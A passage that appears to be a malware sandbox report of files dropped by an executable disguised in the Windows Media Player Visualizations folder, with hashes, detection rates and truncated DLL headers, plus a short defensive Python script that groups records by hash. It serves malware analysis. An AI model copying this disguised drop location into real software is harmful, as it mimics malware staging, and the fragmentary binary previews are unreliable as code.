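Category:dropped
Size (bytes):60
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\\Program Files (x86)\\Windows Media Player\\Visualizations\\TezdDRgSgyeGDKRkzk.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):114688
SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
Malicious:false
Preview:SQLite format 3...
"""

# Content hashes of files the platform writes by itself. PowerShell creates
# __PSScriptPolicyTest_*.ps1/.psm1 at start-up to test AppLocker/WDAC policy;
# the hash below is the one the report lists for that file.
KNOWN_BENIGN = {
    "96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7":
        "PowerShell AppLocker policy-test file",
}


def parse_records(text):
    """Split the listing into dicts; a new record starts at each 'Process:' key."""
    records, current = [], None
    for line in text.splitlines():
        key, sep, value = line.strip().partition(":")
        if not sep:
            continue
        if key == "Process":
            current = {}
            records.append(current)
        if current is not None:
            current[key] = value
    return records


def summarize(text):
    """Group records by SHA-256 and count how often each unique file appears."""
    groups = {}
    for rec in parse_records(text):
        sha = rec.get("SHA-256", "").upper()
        group = groups.setdefault(sha, {
            "count": 0,
            "process": rec.get("Process"),
            "file_type": rec.get("File Type", ""),
            "size": int(rec.get("Size (bytes)", "0")),
            "benign": KNOWN_BENIGN.get(sha),
        })
        group["count"] += 1
    return groups


def format_summary(groups):
    """One line per unique hash: count, hash prefix, size, label, writing process."""
    lines = []
    for sha, g in groups.items():
        label = g["benign"] or g["file_type"].split(",")[0]
        lines.append(f"{g['count']:>3}x  {sha[:16]}...  {g['size']:>8} B  "
                     f"{label}  <- {g['process']}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(format_summary(summarize(RECORDS)))
```

On the full listing this turns the seventeen identical AppLocker records into a single counted line and leaves the SQLite files, which were written by the sample's own process, standing out on their own.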
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                        Category:dropped
                                                                                        Size (bytes):114688
                                                                                        Entropy (8bit):0.9746603542602881
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):106496
Entropy (8bit):1.1358696453229276
Encrypted:false
SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:28591AA4E12D1C4FC761BE7C0A468622
SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:false

Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):49152
Entropy (8bit):0.8180424350137764
Encrypted:false
SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:349E6EB110E34A08924D92F6B334801D
SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:false

Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):25
Entropy (8bit):4.133660689688185
Encrypted:false
SSDEEP:3:aqeM:aqX
MD5:324BC721EC0050C841E1F35FAD0F13EF
SHA1:AE66ECEEDA682C14228A092077E070DC27FC37C7
SHA-256:216B7D8C453E19F8B0B87ED3EAE157F5C7CF8BFF584897EC17A25FE8F725BD88
SHA-512:D2CA774ACCE4B6127D4678DF5C134C852BD38CC181286E119B6E8A71B02AFD481B7F83DC1275372716207428144DFD88E27D85F1C25BFCB9024A2E4E9FA82219
Malicious:false
Preview:FXkWvo3p3IcX2UWCOb4IkTjWr

Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):40960
Entropy (8bit):0.8553638852307782
Encrypted:false
SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:28222628A3465C5F0D4B28F70F97F482
SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:false

Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:dropped
Size (bytes):28672
Entropy (8bit):2.5793180405395284
Encrypted:false
SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:41EA9A4112F057AE6BA17E2838AEAC26
SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:false

Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):294912
Entropy (8bit):6.010605469502259
Encrypted:false
SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:00574FB20124EAFD40DC945EC86CA59C
SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 11%
Joe Sandbox View:
• Filename: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, Detection: malicious
• Filename: aW6kSsgdvv.exe, Detection: malicious
• Filename: HMhdtzxEHf.exe, Detection: malicious
• Filename: kJrNOFEGbQ.exe, Detection: malicious
• Filename: lEwK4xROgV.exe, Detection: malicious
• Filename: zZ1Y43bxxV.exe, Detection: malicious
• Filename: VqGD18ELBM.exe, Detection: malicious
• Filename: updIMdPUj8.exe, Detection: malicious
• Filename: voed9G7p5s.exe, Detection: malicious
• Filename: f3I38kv.exe, Detection: malicious

Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):32768
Entropy (8bit):5.645950918301459
Encrypted:false
SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 29%

Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):22016
Entropy (8bit):5.41854385721431
Encrypted:false
SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
MD5:BBDE7073BAAC996447F749992D65FFBA
SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 9%

Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):23552
Entropy (8bit):5.529329139831718
Encrypted:false
SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
MD5:8AE2B8FA17C9C4D99F76693A627307D9
SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 3%

Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):41472
Entropy (8bit):5.6808219961645605
Encrypted:false
SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:094DE32070BED60A811D983740509054AD017CE4
SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 17%

Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):70144
Entropy (8bit):5.909536568846014
Encrypted:false
SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:E4FA63649F1DBD23DE91861BB39C317D
SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 29%
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):342528
                                                                                        Entropy (8bit):6.170134230759619
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                        MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                        SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                        SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                        SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 50%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):40448
                                                                                        Entropy (8bit):5.7028690200758465
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                                        MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                                        SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                                        SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                                        SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 12%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):69632
                                                                                        Entropy (8bit):5.932541123129161
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 50%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):33792
                                                                                        Entropy (8bit):5.541771649974822
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                        MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                        SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                        SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                        SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 38%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):64000
                                                                                        Entropy (8bit):5.857602289000348
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                        MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                        SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                        SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                        SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):34816
                                                                                        Entropy (8bit):5.636032516496583
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                        MD5:996BD447A16F0A20F238A611484AFE86
                                                                                        SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                        SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                                        SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):39936
                                                                                        Entropy (8bit):5.629584586954759
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                        MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                        SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                        SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                        SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):39936
                                                                                        Entropy (8bit):5.660491370279985
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                                        MD5:240E98D38E0B679F055470167D247022
                                                                                        SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                                        SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                                        SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):342528
                                                                                        Entropy (8bit):6.170134230759619
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                        MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                        SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                        SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                        SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 50%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):38400
                                                                                        Entropy (8bit):5.699005826018714
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                        MD5:87765D141228784AE91334BAE25AD743
                                                                                        SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                        SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                        SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):34304
                                                                                        Entropy (8bit):5.618776214605176
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                        MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                        SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                        SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                        SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 9%
